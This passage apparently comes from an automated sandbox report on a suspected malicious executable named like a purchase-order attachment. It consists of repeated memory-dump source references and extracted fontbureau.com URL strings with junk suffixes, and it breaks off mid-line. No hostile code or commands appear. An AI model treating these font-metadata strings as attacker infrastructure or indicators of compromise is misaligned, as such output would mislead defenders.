        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFQO
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comK
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comT.TTF
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF0
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsq
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd.
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.comQO
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comedFB
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessedK
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiona
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commB
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comonyT
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsivFf
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtalik
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER 